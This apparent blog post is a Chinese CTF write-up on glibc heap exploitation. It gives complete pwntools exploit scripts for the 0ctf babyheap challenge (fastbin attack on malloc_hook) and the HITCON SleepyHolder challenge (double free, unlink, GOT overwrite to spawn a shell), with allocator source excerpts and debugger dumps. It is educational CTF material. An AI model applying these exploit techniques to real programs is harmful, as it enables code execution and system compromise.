<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">p&#x3D;process(&quot;.&#x2F;0ctfbabyheap&quot;)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">context.log_level &#x3D; &quot;debug&quot;</span><br><span class="line"></span><br><span class="line">def Alloc(size):</span><br><span class="line">​	p.recvuntil(&quot;Command:&quot;)</span><br><span class="line">​	p.sendline(str(1))</span><br><span class="line">​	p.recvuntil(&quot;Size:&quot;)</span><br><span class="line">​	p.sendline(str(size))</span><br><span class="line"></span><br><span class="line">def Fill(index,strings):</span><br><span class="line">​	p.recvuntil(&quot;Command:&quot;)</span><br><span class="line">​	p.sendline(str(2))</span><br><span class="line">​	p.recvuntil(&quot;Index:&quot;)</span><br><span class="line">​	p.sendline(str(index))</span><br><span class="line">​	p.recvuntil(&quot;Size:&quot;)</span><br><span class="line">​	print len(strings)</span><br><span class="line">​	p.sendline(str(len(strings)))</span><br><span class="line">​	p.recvuntil(&quot;Content:&quot;)</span><br><span class="line">​	p.sendline(str(strings))</span><br><span class="line"></span><br><span class="line">def Free(index):</span><br><span class="line">​	p.recvuntil(&quot;Command:&quot;)</span><br><span class="line">​	p.sendline(str(3))</span><br><span class="line">​	p.recvuntil(&quot;Index:&quot;)</span><br><span class="line">​	p.sendline(str(index))</span><br><span class="line"></span><br><span class="line">def Dump(index):</span><br><span class="line">​	p.recvuntil(&quot;Command:&quot;)</span><br><span class="line">​	p.sendline(str(4))</span><br><span class="line">​	p.recvuntil(&quot;Index:&quot;)</span><br><span class="line">​	p.sendline(str(index))</span><br><span class="line">​	p.recvuntil(&quot;Content:&quot;)</span><br><span class="line"></span><br><span class="line">def leak():</span><br><span class="line">​	#leak</span><br><span class="line">​	Alloc(0x60) #index 0</span><br><span class="line">​	Alloc(0x40) #index 1</span><br><span class="line"> </span><br><span class="line">​	payload&#x3D;&quot;a&quot;*0x60</span><br><span class="line">​	payload+&#x3D;p64(0)+p64(0x71) #Chunk -&gt;size</span><br><span class="line">​	Fill(0,payload)</span><br><span class="line"> </span><br><span class="line">​	Alloc(0x80) #index 2</span><br><span class="line">​	Alloc(0x10) #index 3 ,to avoid chunk_2 merge into top_chunk</span><br><span class="line"> </span><br><span class="line">​	#Bk_NextSize&#x3D;0x71, to avoid &quot;free(): invalid next size (fast)&quot;</span><br><span class="line">​	payload&#x3D;p64(0)*3</span><br><span class="line">​	payload+&#x3D;p64(0x71) #Chunk2-&gt;BK_nextsize</span><br><span class="line">​	Fill(2,payload)</span><br><span class="line"> </span><br><span class="line">​	Free(1)</span><br><span class="line">​	Alloc(0x60) #index 1</span><br><span class="line"></span><br><span class="line">​	#Fix smallChunk</span><br><span class="line">​	payload&#x3D;&quot;a&quot;*0x40</span><br><span class="line">​	payload+&#x3D;p64(0)+p64(0x91) #Chunk -&gt;size</span><br><span class="line">​	Fill(1,payload)</span><br><span class="line"></span><br><span class="line">​	Free(2)</span><br><span class="line">​	Dump(1)</span><br><span class="line">​	p.recv(82)</span><br><span class="line">​	leak_address&#x3D;u64(p.recv(8))</span><br><span class="line">​	print &quot;[+]leak stirngs&#x3D;&gt;&quot;+hex(leak_address)</span><br><span class="line">​	#Free(0) #for debug</span><br><span class="line">​	return leak_address</span><br><span class="line"></span><br><span class="line">def Attack(base):</span><br><span class="line">​	malloc_hook&#x3D;0x3C4B10-35+base</span><br><span class="line">​	print &quot;[+]malloc_hook &#x3D;&gt; &quot;+hex(malloc_hook)</span><br><span class="line">​	one_gadget&#x3D;base+0x4526a</span><br><span class="line">​	print &quot;[+]one_gadget &#x3D;&gt; &quot;+hex(one_gadget)</span><br><span class="line">​	Alloc(0x60) #index 2</span><br><span class="line">​	Alloc(0x60) #index 4</span><br><span class="line">​	Alloc(0x60) #index 5</span><br><span class="line">​	Free(5)</span><br><span class="line">​	Free(4)#fastbin -&gt;chunk_5-&gt;chunk_4</span><br><span class="line">​	#Fill(2,&quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;)	</span><br><span class="line">​	Fill(2,&quot;A&quot;*(0x160-0xd0+0x18)+p64(0x71)+p64(malloc_hook)) #fastbin -&gt;chunk_5-&gt;malloc_hook-35</span><br><span class="line"></span><br><span class="line">​	Alloc(0x60)#index 4</span><br><span class="line">​	Alloc(0x60)#index 5 &#x3D;&gt;malloc_hook-35</span><br><span class="line"></span><br><span class="line">​	Fill(5,&quot;A&quot;*(35-16)+p64(one_gadget))</span><br><span class="line">​	Alloc(0x10)#get shell</span><br><span class="line"> </span><br><span class="line">leak_address&#x3D;leak()</span><br><span class="line">base&#x3D;leak_address-0x3c4b78</span><br><span class="line">print &quot;[+]Libc Base Address &#x3D;&gt;&quot;+hex(base)</span><br><span class="line"></span><br><span class="line">Attack(base)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>








<h3 id="2-1-3一些注意事项"><a href="#2-1-3一些注意事项" class="headerlink" title="2.1.3一些注意事项"></a>2.1.3一些注意事项</h3><p>在做题目前期碰到的一些问题与解决方案</p>
<p>1.Chunk无法释放到unsorted bins的问题</p>
<p>释放一个small chunk，然后这个chunk的FD和BK便是指向libc某地址的指针（unsroted bins），就可以leak地址了。但是需要注意的是，并不是所有时候，chunk都会被释放到bins上。</p>
<p>例如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Alloc(0x10) #index 0 </span><br><span class="line">Allocc(0x80) #index 1</span><br><span class="line">Free(1)</span><br></pre></td></tr></table></figure>
<p>当我free一个small_chunk，发现它并没有被free到unsort bins（也没有到small bins中），原因在_int_free函数中如此描述，如果释放的内存与top_chunk相邻（且不是fastbin），会被直接合并到top_chunk。之前一直忽略了这个性质。</p>
<p>解决方案很简单，在small_chunk之后再申请一个chunk就行，把它与top_chunk隔开就行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">    &#x2F;*</span><br><span class="line">​      If the chunk borders the current high end of memory,</span><br><span class="line">​      consolidate into top</span><br><span class="line">​    *&#x2F;</span><br><span class="line">​    else &#123;</span><br><span class="line">​      size +&#x3D; nextsize;</span><br><span class="line">​      set_head(p, size | PREV_INUSE);</span><br><span class="line">​      av-&gt;top &#x3D; p;</span><br><span class="line">​      check_chunk(av, p);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>2.在释放chunksize被修改的Chunk_1时,报错invalid next size (fast)，即对next size的检查报错。</p>
<p><img src="https://gitee.com/p0kerface/blog_image_management/raw/master/uploads/how2heap27682.png" alt=""></p>
<p>在程序Free一块内存的时候，会做如下检查。如果下一个chunk的bk next chunk（nextchunk偏移24字节）不正确，则会阻止Free过程。源码如下。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">	&#x2F;* We might not have a lock at this point and concurrent modifications</span><br><span class="line">​	   of system_mem might have let to a false positive.  Redo the test</span><br><span class="line">​	   after getting the lock.  *&#x2F;</span><br><span class="line">​	if (have_lock</span><br><span class="line">​	    || (&#123; assert (locked &#x3D;&#x3D; 0);</span><br><span class="line">​		  mutex_lock(&amp;av-&gt;mutex);</span><br><span class="line">​		  locked &#x3D; 1;</span><br><span class="line">​		  chunk_at_offset (p, size)-&gt;size &lt;&#x3D; 2 * SIZE_SZ</span><br><span class="line">​		    || chunksize (chunk_at_offset (p, size)) &gt;&#x3D; av-&gt;system_mem;</span><br><span class="line">​	      &#125;))</span><br><span class="line">​	  &#123;</span><br><span class="line">​	    errstr &#x3D; &quot;free(): invalid next size (fast)&quot;;</span><br><span class="line">​	    goto errout;</span><br><span class="line">​	  &#125;</span><br></pre></td></tr></table></figure>
<p>查看chunk的结构体，发现bk_nextsize在头部(fd)偏移3个位，64位系统就是24个字节。</p>
<p>所以也就有了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">\#Bk_NextSize&#x3D;0x71, to avoid &quot;free(): invalid next size (fast)&quot;</span><br><span class="line">​	payload&#x3D;p64(0)*3</span><br><span class="line">​	payload+&#x3D;p64(0x71) #Chunk2-&gt;BK_nextsize</span><br><span class="line">​	Fill(2,payload)</span><br></pre></td></tr></table></figure>
<p>Malloc结构如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">struct malloc_chunk &#123;</span><br><span class="line">  INTERNAL_SIZE_T      prev_size;  &#x2F;* Size of previous chunk (if free).  *&#x2F;</span><br><span class="line">  INTERNAL_SIZE_T      size;       &#x2F;* Size in bytes, including overhead. *&#x2F;</span><br><span class="line">  struct malloc_chunk* fd;         &#x2F;* double links -- used only if free. *&#x2F;</span><br><span class="line">  struct malloc_chunk* bk;</span><br><span class="line"></span><br><span class="line">  &#x2F;* Only used for large blocks: pointer to next larger size.  *&#x2F;</span><br><span class="line">  struct malloc_chunk* fd_nextsize; &#x2F;* double links -- used only if free. *&#x2F;</span><br><span class="line">  struct malloc_chunk* bk_nextsize;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>






<h2 id="2-2-SleepyHolder"><a href="#2-2-SleepyHolder" class="headerlink" title="2.2 SleepyHolder"></a>2.2 SleepyHolder</h2><p>概述：Hitcon2016年首创的一种利用手法，使用consolidate机制产生Double Free条件，然后结合unlink实现got表覆盖。</p>
<p><a href="https://github.com/mehQQ/public_writeup/tree/master/hitcon2016/SleepyHolder" target="_blank" rel="noopener">下载链接</a><br><a href="https://blog.csdn.net/qq_33528164/article/details/80040197" target="_blank" rel="noopener">参考思路</a></p>
<h3 id="2-2-1利用细节"><a href="#2-2-1利用细节" class="headerlink" title="2.2.1利用细节:"></a>2.2.1利用细节:</h3><p>1.程序存在一个悬挂指针的问题，就是Free之后会清零标志位，但是不会删除指针。为Double Free提供了条件。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">  switch(choice)</span><br><span class="line">​    &#123;</span><br><span class="line">​        case 1:</span><br><span class="line">​            free(f_ptr);&#x2F;&#x2F;释放内存，没有删除指针f_ptr</span><br><span class="line">​            f_flag &#x3D; 0;&#x2F;&#x2F;清楚标志位 </span><br><span class="line">​            break;</span><br><span class="line">​        case 2:</span><br><span class="line">​            free(s_ptr);</span><br><span class="line">​            s_flag &#x3D; 0;</span><br><span class="line">​            break;</span><br><span class="line">​    &#125;</span><br></pre></td></tr></table></figure>


<p>2.每种内存只能申请一次，除非释放，三种内存又分别fast bins(small)、small bins、large bins都无法相互影响。并且只能写入一次。不能为fastbin的Double Free创造条件。也就引出了这次的利用手法。</p>
<p>3.因为内存指针ptr都是全局变量，PIE又没开启，所以指针都位置是固定。本案例汇总f_ptr的地址就为0x6020d0</p>
<p>全局指针定义</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">char *s_ptr;</span><br><span class="line">char *f_ptr;</span><br><span class="line">char *q_ptr;</span><br></pre></td></tr></table></figure>


<h3 id="2-2-2利用思路"><a href="#2-2-2利用思路" class="headerlink" title="2.2.2利用思路:"></a>2.2.2利用思路:</h3><p>1.首先申请small和large各一块内存。释放small内存，其会被释放到fastbins.</p>
<p>释放huge内存，触发consolidate将fastbin内存整合到small bins,再次释放small。实现double free。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#Double Free</span><br><span class="line">Add(1,&quot;AAAAAA&quot;) </span><br><span class="line">Add(2,&quot;BBBBBB&quot;)</span><br><span class="line">Free(1) #将small chunk放入fastbins</span><br><span class="line">Add(3,&quot;CCCCCC&quot;) #将small chunk放入small bins ，并且设置inuse为free</span><br><span class="line">Free(1) #double free</span><br></pre></td></tr></table></figure>
<p>此时small同时被fastbins和small bins链接。</p>
<p><img src="https://gitee.com/p0kerface/blog_image_management/raw/master/uploads/how2heap30166.png" alt=""></p>
<p>2.重新申请内存small，会从fastbin中取下来。此时small的inuse标志位依旧是0（consolidate会将标志为设置为Free，而fastbin的操作都不会影响标志位）这样就能在small中构造伪堆。释放large，触发unlink。</p>
<p>unlink参考 <a href="http://www.mamicode.com/info-detail-1670578.html" target="_blank" rel="noopener">http://www.mamicode.com/info-detail-1670578.html</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#Unlink</span><br><span class="line"></span><br><span class="line">p_ptr&#x3D;0x6020d0</span><br><span class="line"></span><br><span class="line">fakechunk&#x3D;p64(0)+p64(0x21)</span><br><span class="line"></span><br><span class="line">fakechunk+&#x3D;p64(p_ptr-0x18)+p64(p_ptr-0x10)</span><br><span class="line"></span><br><span class="line">fakechunk+&#x3D;p64(0x20)#for check</span><br><span class="line"></span><br><span class="line">Add(1,fakechunk)</span><br><span class="line"></span><br><span class="line">Free(2) #释放large内存，如果检查前一个堆块为free，则会触发Unlink合并堆块。</span><br></pre></td></tr></table></figure>


<p>触发unlink的代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">    &#x2F;* consolidate backward *&#x2F;</span><br><span class="line">​    if (!prev_inuse(p)) &#123;</span><br><span class="line">​      prevsize &#x3D; p-&gt;prev_size;</span><br><span class="line">​      size +&#x3D; prevsize;</span><br><span class="line">​      p &#x3D; chunk_at_offset(p, -((long) prevsize));</span><br><span class="line">​      unlink(av, p, bck, fwd);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">​    Free chunks结构</span><br><span class="line">​    chunk-&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</span><br><span class="line">​	    |             Size of previous chunk                            |</span><br><span class="line">​	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</span><br><span class="line">​    &#96;head:&#39; |             Size of chunk, in bytes                         |P|</span><br><span class="line">​      mem-&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</span><br><span class="line">​	    |             Forward pointer to next chunk in list             |</span><br><span class="line">​	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</span><br><span class="line">​	    |             Back pointer to previous chunk in list            |</span><br><span class="line">​	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</span><br><span class="line">​	    |             Unused space (may be 0 bytes long)</span><br></pre></td></tr></table></figure>




<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;10gx 0x11b2da0-0x10</span><br><span class="line">0x11b2d90:	0x0000000000000000  0x0000000000000031</span><br><span class="line">0x11b2da0:	0x0000000000000000	  0x00007fe12672db98 &lt;-f_ptr</span><br><span class="line">0x11b2db0:	0x0000000000000000 	 0x0000000000000000</span><br></pre></td></tr></table></figure>
<p>构造fake_chunk</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;10gx 0x11b2da0-0x10</span><br><span class="line">0x11b2d90:	0x0000000000000000 	0x0000000000000031</span><br><span class="line">0x11b2da0:	0x0000000000000000 	0x0000000000000021 &lt;-f_ptr</span><br><span class="line">0x11b2db0:	0x00000000006020B8&lt;-FD 0x00000000006020C0&lt;-BK &lt;-fake_chunk</span><br><span class="line">0x11b2dc0:	0x0000000000000020	&lt;-Next_size 0x0000000000000fb0</span><br></pre></td></tr></table></figure>
<p>设置FD=0x6020d0-0x18 BK=0x6020d0-0x10<br>为了绕过检查if (__builtin_expect (FD-&gt;bk != P || BK-&gt;fd != P, 0))<br>FD-&gt;bk即FD偏移3x机器位(0x8)  BK-&gt;fd即BK偏移 2x机器位(0x8)<br>所以将FD和BK的位置埋在f_ptr（存放指针P）前的位置就能绕过检查。</p>
<p>检查之后，程序执行Unlink操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">FD-&gt;bk &#x3D; BK;	(BK&#x3D;0x6020c0)						      \</span><br><span class="line">BK-&gt;fd &#x3D; FD;    (FD&#x3D;0x6020b8)</span><br></pre></td></tr></table></figure>
<p>实际上，FD-&gt;bk和BK-&gt;fd指向同一个地址，那就是全局指针f_ptr的地址。</p>
<p>执行unlink之前</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;10gx 0x6020d0-0x20</span><br><span class="line">0x6020b0 &lt;stdout&gt;:	0x00007fe12672e620	  0x0000000000000000 &lt;-FD</span><br><span class="line">0x6020c0:	0x00000000011b2dd0 &lt;-BK	    0x00007fe1268dd010</span><br><span class="line">0x6020d0:	0x00000000011b2da0 &lt;-&amp;f_ptr 	0x0000000100000001</span><br></pre></td></tr></table></figure>
<p>执行unlink之后</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;20gx 0x6020d0-0x20</span><br><span class="line">0x6020b0 &lt;stdout&gt;:	0x00007f62589b2620	0x0000000000000000</span><br><span class="line">0x6020c0:	0x000000000072b3e0 	0x00007f6258b61010</span><br><span class="line">0x6020d0:	0x00000000006020b8 &lt;-new&amp;f_ptr	0x0000000100000000</span><br></pre></td></tr></table></figure>

<p>所以此时我们修改了f_ptr为0x6020b0，还拥有对这块内存对可写权限。</p>
<p>3.此时通过向small堆块写数据，就可以修改指向small chunk的全局指针f_ptr（存放于0x6020d0）。之后就是比较套路对操作了，将指针修改到got表，将free_got修改为system。</p>
<h3 id="2-2-3完整的EXP"><a href="#2-2-3完整的EXP" class="headerlink" title="2.2.3完整的EXP"></a>2.2.3完整的EXP</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">from pwn import * </span><br><span class="line"></span><br><span class="line">p&#x3D;process(&quot;.&#x2F;SleepyHolder&quot;)</span><br><span class="line">context.log_level &#x3D; &#39;debug&#39;</span><br><span class="line">gdb.attach(p)</span><br><span class="line">elf&#x3D;ELF(&quot;.&#x2F;SleepyHolder&quot;)</span><br><span class="line"> </span><br><span class="line">def Add(size,secret): #Small:1 Big:2 Huge:3</span><br><span class="line">​	p.recvuntil(&quot;Renew secret&quot;)</span><br><span class="line">​	p.sendline(str(1))</span><br><span class="line">​	p.recvuntil(&quot;want to keep?&quot;)</span><br><span class="line">​	p.sendline(str(size))</span><br><span class="line">​	p.recvuntil(&quot;Tell me your secret:&quot;)</span><br><span class="line">​	p.sendline(secret)</span><br><span class="line">def Free(size):</span><br><span class="line">​	p.recvuntil(&quot;Renew secret&quot;)</span><br><span class="line">​	p.sendline(str(2))</span><br><span class="line">​	p.recvuntil(&quot;Big secret\n&quot;)</span><br><span class="line">​	p.sendline(str(size))</span><br><span class="line">def Renew(size,secret):</span><br><span class="line">​	p.recvuntil(&quot;Renew secret&quot;)</span><br><span class="line">​	p.sendline(str(3))</span><br><span class="line">​	p.recvuntil(&quot;Which Secret do you want to renew?&quot;)</span><br><span class="line">​	p.sendline(str(size))</span><br><span class="line">​	p.recvuntil(&quot;Tell me your secret:&quot;)</span><br><span class="line">​	p.send(secret)	 #not sendline</span><br><span class="line"></span><br><span class="line">#Double Free</span><br><span class="line">Add(1,&quot;AAAAAA&quot;)</span><br><span class="line">Add(2,&quot;BBBBBB&quot;)</span><br><span class="line">Free(1)</span><br><span class="line">Add(3,&quot;CCCCCC&quot;)</span><br><span class="line">Free(1)</span><br><span class="line"></span><br><span class="line">#Unlink</span><br><span class="line">p_ptr&#x3D;0x6020d0</span><br><span class="line">fakechunk&#x3D;p64(0)+p64(0x21)</span><br><span class="line">fakechunk+&#x3D;p64(p_ptr-0x18)+p64(p_ptr-0x10)</span><br><span class="line">fakechunk+&#x3D;p64(0x20)#for check</span><br><span class="line">Add(1,fakechunk)</span><br><span class="line">Free(2) #-&gt; Unlink</span><br><span class="line"></span><br><span class="line">#Leak</span><br><span class="line">got_free&#x3D;elf.got[&#39;free&#39;]</span><br><span class="line">got_puts&#x3D;elf.got[&#39;puts&#39;]</span><br><span class="line">plt_puts&#x3D;elf.plt[&#39;puts&#39;]</span><br><span class="line">got_atoi&#x3D;elf.got[&#39;atoi&#39;]</span><br><span class="line">print &quot;got_puts&#x3D;&quot;+hex(got_puts)</span><br><span class="line">print &quot;plt_puts&#x3D;&quot;+hex(plt_puts)</span><br><span class="line">payload&#x3D;p64(0)+p64(got_puts) #s_ptr-&gt;got_puts</span><br><span class="line">payload+&#x3D;p64(got_puts)+p64(got_free) #p_ptr-&gt;got_free</span><br><span class="line">payload+&#x3D;p64(0x1)*3</span><br><span class="line">Renew(1,payload)</span><br><span class="line">payload&#x3D;p64(plt_puts) #free-&gt;puts</span><br><span class="line">Renew(1,payload)</span><br><span class="line"></span><br><span class="line">Free(2) #free(s_ptr)-&gt;puts(s_ptr-&gt;puts_address)</span><br><span class="line"></span><br><span class="line">puts_address&#x3D;u64(p.recv(6).ljust(8,&quot;\x00&quot;))</span><br><span class="line"></span><br><span class="line">print &quot;[+]puts_address&#x3D;&quot;+hex(puts_address)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">#get shell</span><br><span class="line">system_offset&#x3D;0x45390</span><br><span class="line">puts_offset&#x3D;0x6f690</span><br><span class="line"> </span><br><span class="line">base&#x3D;puts_address-puts_offset</span><br><span class="line">system_addr&#x3D;base+system_offset</span><br><span class="line">print &quot;[+]system_addr&#x3D;&quot;+hex(system_addr)</span><br><span class="line"></span><br><span class="line">payload&#x3D;p64(system_addr)</span><br><span class="line">Renew(1,payload)</span><br><span class="line">Add(2,&quot;&#x2F;bin&#x2F;bash&quot;)</span><br><span class="line">Free(2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>




<h2 id="2-3小结"><a href="#2-3小结" class="headerlink" title="2.3小结"></a>2.3小结</h2><p>以上的两个案例都不是使用一种技术就能解决的问题，都是需要多种技术组合才能拿到shell。例如案例一的关键点在于chunk大小的伪造，实现堆溢出导致fastbin_attack,而案例二使用consolidate机制制造double free，还需要结合unlink才能成功利用。</p>
<p>解题能力最终还要回归到自己对堆机制的理解和对漏洞的感觉。</p>
<p><strong>笔记</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Leak地址的方法 1.got表（前提：PIE关闭）2.free_chunk中的FD&#x2F;BK</span><br><span class="line">Unlink绕过检查机制，需要利用一个全局指针</span><br></pre></td></tr></table></figure>




<h1 id="参考文献："><a href="#参考文献：" class="headerlink" title="参考文献："></a>参考文献：</h1><p>[0] Glibc-2.23源码</p>
<p>[1] <a href="https://me.csdn.net/qq_29343201" target="_blank" rel="noopener">Anciety</a>.0ctf 2017 babyheap writeup.</p>
<p><a href="https://blog.csdn.net/qq_29343201/article/details/66476135[OL/DB],2017-03-26" target="_blank" rel="noopener">https://blog.csdn.net/qq_29343201/article/details/66476135[OL/DB],2017-03-26</a></p>
<p>[2]华庭(庄明强).《glibc内存管理ptmalloc2源代码分析》2011-4-17</p>
